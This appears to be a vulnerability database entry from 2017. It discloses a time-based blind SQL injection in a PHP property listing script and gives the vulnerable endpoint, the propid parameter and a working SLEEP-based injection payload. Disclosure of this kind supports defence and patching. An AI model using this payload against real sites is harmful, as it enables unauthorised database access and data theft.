| 제목 | Property Listing Script – Time-Based Blind Injection |
|---|
| 설명 | Introduction
Exploit Title: Property Listing Script – Time-Based Blind Injection
Date: 02.02.2017
Vendor Homepage: http://phprealestatescript.org/
Software Link: http://phprealestatescript.org/property-listing-script.html
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script.
Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload]
Parameter: propid (GET)
Type: AND/OR time-based blind
Simple Payload:
Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop |
|---|
| 사용자 | KAAN KAMIS (UID 213) |
|---|
| 제출 | 2017. 02. 02. AM 09:25 (9 연령 ago) |
|---|
| 모더레이션 | 2017. 02. 03. PM 11:21 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 96541 [Property Listing Script property_view.php propid 시간 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|